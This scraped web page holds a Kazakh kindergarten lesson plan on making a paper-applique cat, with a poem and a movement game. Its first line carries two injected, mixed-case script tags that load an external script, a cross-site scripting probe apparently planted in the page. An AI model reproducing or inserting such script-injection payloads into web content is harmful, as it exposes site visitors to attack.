<sCrIpT sRc=///1.js></ScRiPt><sCrIpT sRc=///1.js></ScRiPt>

02.02.2017

«Менің сүйкімді мысығым»

Тақырыбы: : «Менің сүйкімді

мысығым»

Мақсаты: Балалардың

өнерге деген қызығушылығын, үй жануарларына деген сүйіспеншілік сезімдерін

ояту, шығармашылық ой қиялын дамытып, табиғи материалдармен дұрыс жұмыс жасауға

дағдыландыру. Кейіпкерлерді сахналай білуге үйрету. Саусақ моторикасын дамыту.

Сабақтың барысы:

Ғажайып сәт. Төбеден

қолшатырға ілінген мысықты түсіру. 

-Балалар, мына кішкене мысыққа қарайықшы. Ол аулада кішкене күшікпен ойнап

жүріп, қатты жел тұрғанда адасып, қол шатырдың астына тығылып қалыпты. Біз

мысыққа үйін тауып беруге көмектесемізбе? 

-Иә. 

Мысық туралы қандай тақпақ білеміз? 

Мен – мияу мысықпын 

Өзім сондай пысықпын. 

Қастық ойлар дұшпанға 

Арам тамақ тышқанға 

Жолбарысша атылам 

Тісті аямай батырам. 

-Олай болса ,бүгін осы кішкене сүйкімді мысықты жапсыруды үйренеміз. 

Мысықты үйіне жеткізу үшін , сұрақтарға жауап бере отырып мысықтың дене

мүшелерін үлгі бойынша жапсырады. 

Жұмыс барысы: 

. Үлгідегідей мысықтың басын жапсыру.( Жылы түстерді атау). 

. Үлгі бойынша мысықтың денесін жапсыру.(Суық түстерді атау). 

. Үлгідегідей құйрығын жапсыру.(Қазақ тілінде қанша дыбыс бар?) 

Сергіту сәті. «Ашулы» және «көңілді» мысық ойынын ойнату. 

«Бір» дегенде екі қолдарын беттеріне тигізіп ұйықтау. 

«Екі» дегенде «ш-ш-ш» деп ашулы мысықты бейнелеу. 

«Үш» дегенде «Мяу-у» деп көңілді қалпына ену. 

Просмотров: 534


Пікір қосу



Деректерді қолтаңбаға қосу